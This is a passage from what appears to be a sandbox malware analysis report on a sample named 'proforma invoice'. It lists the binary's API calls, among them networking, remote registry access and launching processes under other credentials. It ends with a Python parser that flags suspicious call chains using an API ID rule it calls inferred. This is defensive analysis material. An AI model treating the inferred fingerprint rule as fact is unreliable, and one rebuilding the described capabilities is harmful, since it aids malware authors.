                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                  • String ID:
                  • API String ID: 1992179935-0
                  • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                  • Instruction ID: bd662939c6e7712e4ea2a37fbdbf08403bbf1fa4b6f877b96852bb4175e907a1
                  • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                  • Instruction Fuzzy Hash: C681C172A00706AFE720AB69CD41F6A73A9EF41764F25462FF552DB781E770DA008B90
                  APIs
                    • Part of subcall function 00B23149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,00B2101C,00000000,?,?,00000000), ref: 00B23195
                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00B21DC0
                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00B21DE1
                  • WSAGetLastError.WSOCK32 ref: 00B21DF2
                  • inet_ntoa.WSOCK32(?), ref: 00B21E8C
                  • htons.WSOCK32(?,?,?,?,?), ref: 00B21EDB
                  • _strlen.LIBCMT ref: 00B21F35
                    • Part of subcall function 00B039E8: _strlen.LIBCMT ref: 00B039F2
                    • Part of subcall function 00AA6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,00ABCF58,?,?,?), ref: 00AA6DBA
                    • Part of subcall function 00AA6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00ABCF58,?,?,?), ref: 00AA6DED
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                  • String ID:
                  • API String ID: 1923757996-0
                  • Opcode ID: 4cf6c8513ae97f9ede276e7315c9a985ba24449d8bc7361b4b18019b6e7fe9fe
                  • Instruction ID: b7e83a696d095caa9028841c2a9221aa11dea869d7e4759e052a32ce1f1b89ba
                  • Opcode Fuzzy Hash: 4cf6c8513ae97f9ede276e7315c9a985ba24449d8bc7361b4b18019b6e7fe9fe
                  • Instruction Fuzzy Hash: D9A1E030504350AFC320DF28D995E6ABBE5EF95318F54899CF45A5B2E2CB31ED42CB92
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00AC82D9,00AC82D9,?,?,?,00AD644F,00000001,00000001,8BE85006), ref: 00AD6258
                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00AD644F,00000001,00000001,8BE85006,?,?,?), ref: 00AD62DE
                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00AD63D8
                  • __freea.LIBCMT ref: 00AD63E5
                    • Part of subcall function 00AD3820: RtlAllocateHeap.NTDLL(00000000,?,00B71444,?,00ABFDF5,?,?,00AAA976,00000010,00B71440,00AA13FC,?,00AA13C6,?,00AA1129), ref: 00AD3852
                  • __freea.LIBCMT ref: 00AD63EE
                  • __freea.LIBCMT ref: 00AD6413
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                  • String ID:
                  • API String ID: 1414292761-0
                  • Opcode ID: 19656727a0828baeaa3ad340023805f6300bf269d642ec3a76bb9f180e275322
                  • Instruction ID: b8ee12a38b308cf0ef38d70328c6ba615f2af519c33b3e9a9e74d24f71b43b4c
                  • Opcode Fuzzy Hash: 19656727a0828baeaa3ad340023805f6300bf269d642ec3a76bb9f180e275322
                  • Instruction Fuzzy Hash: 6C51E172A00216ABDF258F64DD81EAF7BA9EF44750F15462AFC06DB241DB34DC44D660
                  APIs
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                    • Part of subcall function 00B2C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B2B6AE,?,?), ref: 00B2C9B5
                    • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2C9F1
                    • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2CA68
                    • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2CA9E
                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B2BCCA
                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B2BD25
                  • RegCloseKey.ADVAPI32(00000000), ref: 00B2BD6A
                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B2BD99
                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B2BDF3
                  • RegCloseKey.ADVAPI32(?), ref: 00B2BDFF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                  • String ID:
                  • API String ID: 1120388591-0
                  • Opcode ID: c08b8a6259aac37bf3f89acfac8721b668cb0d3addfb6be66472941416916d45
                  • Instruction ID: 389cbb8c2f38ea90b726363996101915b6841db320dd75e2d1eeb17259a56302
                  • Opcode Fuzzy Hash: c08b8a6259aac37bf3f89acfac8721b668cb0d3addfb6be66472941416916d45
                  • Instruction Fuzzy Hash: AB81AC30208241AFC714DF24D881E6ABBE5FF85348F1489ACF5598B2A2DF31ED45CB92
                  APIs
                  • VariantInit.OLEAUT32(00000035), ref: 00AFF7B9
                  • SysAllocString.OLEAUT32(00000001), ref: 00AFF860
                  • VariantCopy.OLEAUT32(00AFFA64,00000000), ref: 00AFF889
                  • VariantClear.OLEAUT32(00AFFA64), ref: 00AFF8AD
                  • VariantCopy.OLEAUT32(00AFFA64,00000000), ref: 00AFF8B1
                  • VariantClear.OLEAUT32(?), ref: 00AFF8BB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Variant$ClearCopy$AllocInitString
                  • String ID:
                  • API String ID: 3859894641-0
                  • Opcode ID: c5474fdb31a67ad531ed2ab5931777c9a762c51ad97aad423eb94d26de1e6fd8
                  • Instruction ID: ae4e7ae3c25b36fe126912d774ab89a0f604e288b82b96ee7876d628423349d1
                  • Opcode Fuzzy Hash: c5474fdb31a67ad531ed2ab5931777c9a762c51ad97aad423eb94d26de1e6fd8
                  • Instruction Fuzzy Hash: DF51B635500318BECF24ABE5D8D5B79B3A8EF45710B249467FA05DF292DBB08C40D7A6
                  APIs
                    • Part of subcall function 00AA7620: _wcslen.LIBCMT ref: 00AA7625
                    • Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A
                  • GetOpenFileNameW.COMDLG32(00000058), ref: 00B194E5
                  • _wcslen.LIBCMT ref: 00B19506
                  • _wcslen.LIBCMT ref: 00B1952D
                  • GetSaveFileNameW.COMDLG32(00000058), ref: 00B19585
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen$FileName$OpenSave
                  • String ID: X
                  • API String ID: 83654149-3081909835
                  • Opcode ID: 217b5cdf11f560fac54d27fa4425f343690791ba4e65b4a3d7ffd6b12d6d78f8
                  • Instruction ID: 87c8c2b9237b725ba333b9a32a0edeb118306485bf0acadda23752a494499c69
                  • Opcode Fuzzy Hash: 217b5cdf11f560fac54d27fa4425f343690791ba4e65b4a3d7ffd6b12d6d78f8
                  • Instruction Fuzzy Hash: A9E1C0319083418FD724DF24C991AAEB7E5FF85310F1489ADF8999B2A2DB30DD45CB92
                  APIs
                    • Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2
                  • BeginPaint.USER32(?,?,?), ref: 00AB9241
                  • GetWindowRect.USER32(?,?), ref: 00AB92A5
                  • ScreenToClient.USER32(?,?), ref: 00AB92C2
                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00AB92D3
                  • EndPaint.USER32(?,?,?,?,?), ref: 00AB9321
                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00AF71EA
                    • Part of subcall function 00AB9339: BeginPath.GDI32(00000000), ref: 00AB9357
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                  • String ID:
                  • API String ID: 3050599898-0
                  • Opcode ID: baab8c285dc236cc055611b23d5437a6747983517a7f8b012a08dc8aae41cdd1
                  • Instruction ID: e376b96954ac5b109e73b17dd61faa47ce4c2b230ae0fea04d8d55d38d919700
                  • Opcode Fuzzy Hash: baab8c285dc236cc055611b23d5437a6747983517a7f8b012a08dc8aae41cdd1
                  • Instruction Fuzzy Hash: 90418D71104200AFD711DF68C885FBB7BB8EB55320F140669FAA9972B2CB319846DB61
                  APIs
                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00B1080C
                  • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00B10847
                  • EnterCriticalSection.KERNEL32(?), ref: 00B10863
                  • LeaveCriticalSection.KERNEL32(?), ref: 00B108DC
                  • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00B108F3
                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B10921
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                  • String ID:
                  • API String ID: 3368777196-0
                  • Opcode ID: 966c6af6bf28883432f426b259efea20ca1e0cfd48400e04a17ba0330ba871cc
                  • Instruction ID: 7322cb343e6c08fe5c5e689a0abeb13b11f52bf1a842abcd0bc1b1ee5f435a87
                  • Opcode Fuzzy Hash: 966c6af6bf28883432f426b259efea20ca1e0cfd48400e04a17ba0330ba871cc
                  • Instruction Fuzzy Hash: 49418D71900205EFDF14AFA4DD85AAA77B9FF04310F1440A9ED04AB297DB74DEA0DBA0
                  APIs
                  • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00AFF3AB,00000000,?,?,00000000,?,00AF682C,00000004,00000000,00000000), ref: 00B3824C
                  • EnableWindow.USER32(00000000,00000000), ref: 00B38272
                  • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00B382D1
                  • ShowWindow.USER32(00000000,00000004), ref: 00B382E5
                  • EnableWindow.USER32(00000000,00000001), ref: 00B3830B
                  • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00B3832F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$Show$Enable$MessageSend
                  • String ID:
                  • API String ID: 642888154-0
                  • Opcode ID: 8491bd1fc6e1a381d339ca4d098ec915e422c3dc103b4e49e271f72ab7cd6f10
                  • Instruction ID: 2c5ec1deb5e11c205b087170914ecedad12fc3b272e1bc6c310f3e5710e467dd
                  • Opcode Fuzzy Hash: 8491bd1fc6e1a381d339ca4d098ec915e422c3dc103b4e49e271f72ab7cd6f10
                  • Instruction Fuzzy Hash: 8F418334601744AFDB12CF19DC99BA57BE0FB4A714F2841E9FA085B262CB31A842CF52
                  APIs
                  • IsWindowVisible.USER32(?), ref: 00B04C95
                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B04CB2
                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B04CEA
                  • _wcslen.LIBCMT ref: 00B04D08
                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00B04D10
                  • _wcsstr.LIBVCRUNTIME ref: 00B04D1A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                  • String ID:
                  • API String ID: 72514467-0
                  • Opcode ID: 787cf8d7ab933037955f0d03b6a4077eac44674c535b6b63d7bb945a26d12998
                  • Instruction ID: d1bdce861d0fb25626cbed6feeed020533ef68e9a78ff6c06e3a906a5348f271
                  • Opcode Fuzzy Hash: 787cf8d7ab933037955f0d03b6a4077eac44674c535b6b63d7bb945a26d12998
                  • Instruction Fuzzy Hash: 6D21F2B2204200BBEB255B69AD4AE7F7FDCDF45750F1081B9F905DB192EB61DC0097A0
                  APIs
                    • Part of subcall function 00AA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA3A97,?,?,00AA2E7F,?,?,?,00000000), ref: 00AA3AC2
                  • _wcslen.LIBCMT ref: 00B1587B
                  • CoInitialize.OLE32(00000000), ref: 00B15995
                  • CoCreateInstance.OLE32(00B3FCF8,00000000,00000001,00B3FB68,?), ref: 00B159AE
                  • CoUninitialize.OLE32 ref: 00B159CC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                  • String ID: .lnk
                  • API String ID: 3172280962-24824748
                  • Opcode ID: 4feb3de6a24c61ae859986c89c87e06af2e4ceb0e629c1f49ace77e44963e82b
                  • Instruction ID: 844e7375c0cd7473bb951f20f99b6e122d023611b205b7c6b7424fa0a33bec40
                  • Opcode Fuzzy Hash: 4feb3de6a24c61ae859986c89c87e06af2e4ceb0e629c1f49ace77e44963e82b
                  • Instruction Fuzzy Hash: C8D15471608601DFC724DF24C580A6EBBE5EF89710F54889DF88A9B261DB31ED85CB92
                  APIs
                    • Part of subcall function 00B00FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B00FCA
                    • Part of subcall function 00B00FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B00FD6
                    • Part of subcall function 00B00FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B00FE5
                    • Part of subcall function 00B00FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B00FEC
                    • Part of subcall function 00B00FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B01002
                  • GetLengthSid.ADVAPI32(?,00000000,00B01335), ref: 00B017AE
                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00B017BA
                  • HeapAlloc.KERNEL32(00000000), ref: 00B017C1
                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 00B017DA
                  • GetProcessHeap.KERNEL32(00000000,00000000,00B01335), ref: 00B017EE
                  • HeapFree.KERNEL32(00000000), ref: 00B017F5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                  • String ID:
                  • API String ID: 3008561057-0
                  • Opcode ID: 17c42430e93e94a151fbde532b3d5411b00fabdfe65f87dcb4e025ccceb3a87f
                  • Instruction ID: e39c49ac4f8ceac8e79d166f3e2e01bc3cbb35e8c9c9e6ffe046bc9a06ab3c63
                  • Opcode Fuzzy Hash: 17c42430e93e94a151fbde532b3d5411b00fabdfe65f87dcb4e025ccceb3a87f
                  • Instruction Fuzzy Hash: C711BEB6500605FFDB18DFA8CC49BAE7FE9EB45355F204898F482A7290CB35AD40DB60
                  APIs
                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B014FF
                  • OpenProcessToken.ADVAPI32(00000000), ref: 00B01506
                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00B01515
                  • CloseHandle.KERNEL32(00000004), ref: 00B01520
                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B0154F
                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00B01563
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                  • String ID:
                  • API String ID: 1413079979-0
                  • Opcode ID: 8ccf9af51fc2958f50e1fa1abbba18b3a7062eadff2c026fe56306b396f2b5d0
                  • Instruction ID: 062ba48f98698b1e6970369b25e1085fe748ca6221e4aa7d43c8605987076d57
                  • Opcode Fuzzy Hash: 8ccf9af51fc2958f50e1fa1abbba18b3a7062eadff2c026fe56306b396f2b5d0
                  • Instruction Fuzzy Hash: F7114472500209ABDB11CFA8DD49BDE7FA9EB48708F144064FA05A21A0C7718E649B60
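                  The per-function listings above all share one shape: a run of "• Name.Module(args), ref: address" lines, with callee calls prefixed "Part of subcall function", followed by a Similarity block whose "API ID" is a compact fingerprint of the call names. The Python below is an added example, not part of this report and not Joe Sandbox code: it parses those lines into records, rebuilds the API ID so the value on the page can be checked or recomputed for a different report, and flags a few call combinations an analyst triaging a compiled AutoIt binary would want surfaced (the run-as-user chain in the block directly above, remote registry enumeration, forced thread termination). The API ID rule is inferred from the IDs printed on this page and is an assumption, not a documented algorithm; the chain labels are the example's own. The sample input is copied from two listings on this page.

```python
"""Parse Joe Sandbox per-function 'APIs' listings and rebuild their API ID.

Added example, not part of the report or of Joe Sandbox. The API ID rule
below is inferred from the IDs printed on this page (assumption), and the
chain labels in CHAINS are this example's own, not a Joe Sandbox signature.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Tuple

# One "• Name.Module(args), ref: addr" line; callee lines carry the report's
# "Part of subcall function XXXXXXXX:" prefix. Some names have no "(args)".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>\S+?)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
# CamelCase words; lowercase runtime names keep their underscores
# ("_wcslen", "inet_ntoa", "___vcrt_") so each stays one token.
TOKEN = re.compile(r"_*[A-Z]?[a-z]+(?:_[a-z]+)*_*")


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: Tuple[str, ...]
    ref: int
    subcall: Optional[int]  # callee address for "Part of subcall" lines


def parse_api_block(text: str) -> List[ApiCall]:
    """Return the calls under one 'APIs' heading, in report order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # heading or metadata line, not a call
        args = tuple(a for a in (m["args"] or "").split(",") if a)
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), sub))
    return calls


def api_id(calls: List[ApiCall]) -> str:
    """Rebuild the 'API ID' shown under 'Similarity'.

    Inferred rule (assumption): split every call name into CamelCase tokens,
    drop tokens of three characters or fewer (Get, Set, Reg, Sid, W, ...),
    count them, and emit one group per count from most to least frequent,
    each group in ASCII order, groups joined with '$'. Subcall lines count.
    """
    counts = Counter(t for c in calls for t in TOKEN.findall(c.name) if len(t) > 3)
    by_count = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


# Call combinations worth surfacing from a listing. Labels are this example's
# own (assumption); the API names are those printed on this page.
CHAINS = {
    "run as another user": {"OpenProcessToken", "CreateEnvironmentBlock", "CreateProcessWithLogonW"},
    "remote registry enumeration": {"RegConnectRegistryW", "RegOpenKeyExW", "RegEnumValueW"},
    "forced thread termination": {"TerminateThread", "WaitForSingleObject"},
}


def flag_chains(calls: List[ApiCall]) -> List[str]:
    """Labels of every chain whose calls all appear in this block."""
    names = {c.name for c in calls}
    return [label for label, needed in CHAINS.items() if needed <= names]


# Sample input copied from two of the listings on this page.
RUNAS_BLOCK = """APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B014FF
• OpenProcessToken.ADVAPI32(00000000), ref: 00B01506
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00B01515
• CloseHandle.KERNEL32(00000004), ref: 00B01520
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B0154F
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00B01563
"""
SOCKET_BLOCK = """APIs
  • Part of subcall function 00B23149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,00B2101C,00000000,?,?,00000000), ref: 00B23195
• __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00B21DC0
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00B21DE1
• WSAGetLastError.WSOCK32 ref: 00B21DF2
• inet_ntoa.WSOCK32(?), ref: 00B21E8C
• htons.WSOCK32(?,?,?,?,?), ref: 00B21EDB
• _strlen.LIBCMT ref: 00B21F35
  • Part of subcall function 00B039E8: _strlen.LIBCMT ref: 00B039F2
  • Part of subcall function 00AA6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,00ABCF58,?,?,?), ref: 00AA6DBA
  • Part of subcall function 00AA6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00ABCF58,?,?,?), ref: 00AA6DED
"""

if __name__ == "__main__":
    for block in (RUNAS_BLOCK, SOCKET_BLOCK):
        calls = parse_api_block(block)
        print(api_id(calls), flag_chains(calls))
```

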